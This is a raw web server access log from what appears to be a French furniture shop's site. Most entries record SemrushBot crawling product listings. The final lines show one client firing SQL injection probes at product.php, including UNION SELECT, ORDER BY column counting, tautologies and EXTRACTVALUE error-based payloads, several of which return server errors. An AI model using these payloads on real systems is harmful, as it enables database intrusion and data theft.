85.208.96.210 - - [20/Aug/2026:05:51:52 +0200] "GET /category.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t59=0&t59=0&t59=0&t59=0&t59=0&t59=0&t59=0&t59=1&t60=1&t62=1&x5=1 HTTP/1.1" 200 70456 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [20/Aug/2026:05:52:21 +0200] "GET /new-products.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=0&x20=1&x23=0&x23=1&x5=0&x5=1 HTTP/1.1" 200 63783 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [20/Aug/2026:05:52:21 +0200] "GET /new-products.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=0&x20=1&x23=0&x23=1&x5=0&x5=1 HTTP/1.1" 200 63705 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [20/Aug/2026:05:52:23 +0200] "GET /new-products.php?a=24&a=24&a=24&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=1&x20=0&x20=1&x21=1&x22=1&x23=0&x23=1 HTTP/1.1" 200 131823 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [20/Aug/2026:05:52:27 +0200] "GET /new-products.php?a=25&a=25&a=25&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=1&x20=1&x21=1&x22=0&x22=0&x22=0&x22=1&x23=0&x23=1 HTTP/1.1" 200 132426 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [20/Aug/2026:05:52:34 +0200] "GET /new-products.php?a=24&a=25&a=25&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=0&x20=1&x21=1&x22=0&x22=1&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 155241 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [20/Aug/2026:05:52:45 +0200] "GET /new-products.php?a=25&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=1&x22=0&x22=1&x23=0&x23=0&x23=0&x23=0&x23=0&x23=0&x23=1&x5=1 HTTP/1.1" 200 90558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.194 - - [20/Aug/2026:05:53:21 +0200] "GET /new-products.php?a=24&a=24&a=24&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=0&x20=0&x20=1&x21=0&x21=0&x21=1&x23=0&x23=0&x23=0&x23=1 HTTP/1.1" 200 103013 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [20/Aug/2026:05:53:23 +0200] "GET /new-products.php?a=24&a=24&a=24&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=1&x21=1&x22=1&x23=0&x23=0&x23=1&x5=1 HTTP/1.1" 200 166238 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [20/Aug/2026:05:53:25 +0200] "GET /new-products.php?a=25&a=25&a=25&a=25&a=25&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=1&x21=1&x22=1&x23=1 HTTP/1.1" 200 131103 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [20/Aug/2026:05:53:33 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&a=24&a=25&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x20=0&x20=0&x20=1 HTTP/1.1" 200 64385 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [20/Aug/2026:05:53:35 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&a=24&a=25&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x20=0&x20=0&x20=1 HTTP/1.1" 200 64355 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.212 - - [20/Aug/2026:05:53:38 +0200] "GET /new-products.php?a=25&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=1&x21=0&x21=1&x23=0&x23=1&x5=0&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 160976 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [20/Aug/2026:05:54:19 +0200] "GET /new-products.php?a=24&a=25&a=25&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x20=1&x22=0&x22=1&x23=0&x23=0&x23=0&x23=1 HTTP/1.1" 200 64377 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [20/Aug/2026:05:54:20 +0200] "GET /new-products.php?a=24&a=25&a=25&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x20=1&x22=0&x22=1&x23=0&x23=0&x23=0&x23=1 HTTP/1.1" 200 64331 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [20/Aug/2026:05:54:27 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x23=1&x5=0&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 63913 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [20/Aug/2026:05:54:27 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x23=1&x5=0&x5=0&x5=0&x5=0&x5=1 HTTP/1.1" 200 63913 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [20/Aug/2026:05:54:37 +0200] "GET /new-products.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=48&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=0&x20=1&x21=1&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 63860 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
118.195.182.137 - - [20/Aug/2026:05:54:51 +0200] "GET / HTTP/1.1" 200 305551 "-" "curl-proxy/1.0"
185.191.171.17 - - [20/Aug/2026:05:55:00 +0200] "GET /new-products.php?a=24&a=24&a=24&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x20=1&x21=0&x21=1&x23=0&x23=0&x23=1 HTTP/1.1" 200 137719 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.204 - - [20/Aug/2026:05:55:03 +0200] "GET /new-products.php?a=25&a=25&a=25&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=1&x20=0&x20=1&x21=0&x21=1&x22=1&x5=0&x5=1 HTTP/1.1" 200 154824 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [20/Aug/2026:05:55:15 +0200] "GET /new-products.php?a=24&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=1&x20=0&x20=0&x20=1&x21=1&x22=0&x22=0&x22=1&x23=0&x23=0&x23=1 HTTP/1.1" 200 137941 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [20/Aug/2026:05:55:23 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=1&x21=1&x5=0&x5=1 HTTP/1.1" 200 130639 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.198 - - [20/Aug/2026:05:55:55 +0200] "GET /new-products.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=1&x21=1&x22=1&x23=0&x23=0&x23=1 HTTP/1.1" 200 136160 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [20/Aug/2026:05:55:56 +0200] "GET /new-products.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=1&x20=0&x20=0&x20=0&x20=0&x20=1&x21=1&x22=1&x23=0&x23=1&x5=1 HTTP/1.1" 200 166618 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [20/Aug/2026:05:56:18 +0200] "GET /new-products.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x21=0&x21=0&x21=0&x21=1&x22=1&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 200879 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.202 - - [20/Aug/2026:05:56:21 +0200] "GET /new-products.php?a=24&a=24&a=24&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=1&x21=0&x21=0&x21=1&x22=1&x23=0&x23=0&x23=1&x5=1 HTTP/1.1" 200 161402 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.199 - - [20/Aug/2026:05:56:24 +0200] "GET /new-products.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=1&x21=0&x21=0&x21=0&x21=1&x23=0&x23=0&x23=0&x23=0&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 138394 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [20/Aug/2026:05:56:28 +0200] "GET /new-products.php?a=25&a=25&a=25&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=0&x20=1&x21=0&x21=1&x23=1&x5=0&x5=1 HTTP/1.1" 200 160486 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.210 - - [20/Aug/2026:05:57:00 +0200] "GET /new-products.php?a=24&a=25&a=25&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=1&x21=1&x22=1&x23=0&x23=0&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 132022 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [20/Aug/2026:05:57:20 +0200] "GET /marques.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo=20-lits-gigognes&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&t47=0&t47=0&t47=1&t58=0&t58=0&t58=0&t58=0&t58=0&t58=1&t60=1 HTTP/1.1" 200 64424 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [20/Aug/2026:05:57:20 +0200] "GET /marques.php?a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo=20-lits-gigognes&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&seo_marq=20&t47=0&t47=0&t47=1&t58=0&t58=0&t58=0&t58=0&t58=0&t58=1&t60=1 HTTP/1.1" 200 64418 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [20/Aug/2026:05:57:30 +0200] "GET /new-products.php?a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=0&x20=1&x21=1&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 166908 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [20/Aug/2026:05:57:38 +0200] "GET /new-products.php?a=24&a=25&a=25&a=25&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x20=0&x20=0&x20=0&x20=0&x20=1&x21=0&x21=1&x22=1&x23=1&x5=1 HTTP/1.1" 200 131942 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [20/Aug/2026:05:57:40 +0200] "GET /category.php?a=24&a=24&a=24&a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t59=1&t60=0&t60=1&t62=0&t62=1&x20=1 HTTP/1.1" 200 70275 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [20/Aug/2026:05:58:10 +0200] "GET /new-products.php?a=24&a=24&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=1&x20=1&x21=0&x21=1&x22=1&x23=0&x23=1&x5=0&x5=0&x5=1 HTTP/1.1" 200 166390 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [20/Aug/2026:05:58:26 +0200] "GET /category.php?a=24&a=24&a=24&a=24&a=24&a=24&a=24&a=24&a=24&a=24&b=1&b=1&b=1&b=1&b=1&b=1&b=1&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=24&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t59=1&t60=0&t60=0&t60=1&x20=1 HTTP/1.1" 200 70265 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
92.142.152.98 - - [20/Aug/2026:05:58:42 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1 HTTP/1.1" 200 197988 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
185.191.171.19 - - [20/Aug/2026:05:58:43 +0200] "GET /new-products.php?a=24&a=24&a=25&b=1&b=1&b=1&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=25&histo_track=1&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&seo_cat&x17=0&x17=0&x17=0&x17=0&x17=1&x20=0&x20=1&x23=1&x5=1 HTTP/1.1" 200 90324 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
92.142.152.98 - - [20/Aug/2026:05:58:44 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%27%20AND%201=1%20UNION%20SELECT%20NULL--%20- HTTP/1.1" 200 198616 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
92.142.152.98 - - [20/Aug/2026:05:58:45 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=%29%20AND%20%2870648815%3D70648815%27 HTTP/1.1" 200 209252 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.142.152.98 - - [20/Aug/2026:05:58:45 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%20ORDER%20BY%201--%20- HTTP/1.1" 200 198133 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:45 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%27%20ORDER%20BY%201--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
92.142.152.98 - - [20/Aug/2026:05:58:45 +0200] "GET /product.php?seo=%27%29%20AND%20%28%27hqjntj%27%3D%27hqjntj%27%27&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.6 - - [20/Aug/2026:05:58:45 +0200] "GET /category.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=0&t58=0&t58=0&t58=1&t59=0&t59=0&t59=0&t59=1&t60=0&t60=1&x20=0&x20=0&x20=1 HTTP/1.1" 200 191228 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
92.142.152.98 - - [20/Aug/2026:05:58:46 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%20AND%20EXTRACTVALUE%284395%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%284395%3D4395%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 200 200110 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.6 - - [20/Aug/2026:05:58:47 +0200] "GET /category.php?debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&debut=0&seo=47-lits-gigognes&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&seo_cat=47&t58=0&t58=0&t58=0&t58=0&t58=1&t59=0&t59=0&t59=0&t59=1&t60=0&t60=1&x20=0&x20=0&x20=1 HTTP/1.1" 200 191280 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
92.142.152.98 - - [20/Aug/2026:05:58:46 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%20ORDER%20BY%201000--%20- HTTP/1.1" 200 198094 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.142.152.98 - - [20/Aug/2026:05:58:46 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%27%20ORDER%20BY%201--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:47 +0200] "GET /product.php?seo=%27%29%20AND%20%28%27hqjntj%27%3D%27hqjntj%27%27&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:48 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%27%20AND%20EXTRACTVALUE%285670%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285670%3D5670%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 200 200236 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
92.142.152.98 - - [20/Aug/2026:05:58:48 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%27%20ORDER%20BY%201--%20- HTTP/1.1" 200 198173 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
92.142.152.98 - - [20/Aug/2026:05:58:48 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%27%20ORDER%20BY%201--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:49 +0200] "GET /product.php?seo=%27%29%20AND%20%28%27hqjntj%27%3D%27hqjntj%27%27&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
